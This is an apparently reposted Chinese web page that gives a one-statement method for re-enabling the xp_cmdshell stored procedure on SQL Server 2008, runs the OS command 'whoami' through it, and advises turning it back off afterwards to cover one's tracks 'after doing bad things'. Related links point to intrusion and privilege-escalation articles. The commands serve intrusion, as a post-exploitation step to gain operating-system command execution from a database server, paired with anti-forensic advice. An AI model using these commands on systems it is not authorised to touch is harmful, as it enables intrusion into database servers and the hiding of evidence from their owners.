您现在的位置是:网站首页> 编程资料编程资料
MSSQL2008一句话启用xp_cmdshell_入侵防御_网络安全_
2023-05-24
577人已围观
简介 MSSQL2008一句话启用xp_cmdshell_入侵防御_网络安全_
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
幸运的是:只要该扩展存储过程没被删除,我们就可以一句话启用它(不支持多句执行的话,请单独执行每句):
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
好了,来试试!
exec master..xp_cmdshell "whoami"
PS:干完坏事要擦PP哦!将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了
相关内容
- 微软的“后门”Ntsd的远程调试功能利用图解_入侵防御_网络安全_
- 入侵渗透进入某学校网站服务器_入侵防御_网络安全_
- 安全中国提取权限过程 图文_入侵防御_网络安全_
- Windows系统安全风险-本地NTLM重放提权_入侵防御_网络安全_
- 文件上传漏洞全面渗透分析小结_入侵防御_网络安全_
- sql手工注入语句&SQL手工注入大全_入侵防御_网络安全_
- 详解Filezilla server 提权_入侵防御_网络安全_
- https加密也被破解 HEIST攻击从加密数据获取明文_入侵防御_网络安全_
- iPhone和Mac也会被黑 一条iMessage密码可能就被盗了_入侵防御_网络安全_
- 黑客都很厉害吗 厉害的只是一小部分_入侵防御_网络安全_
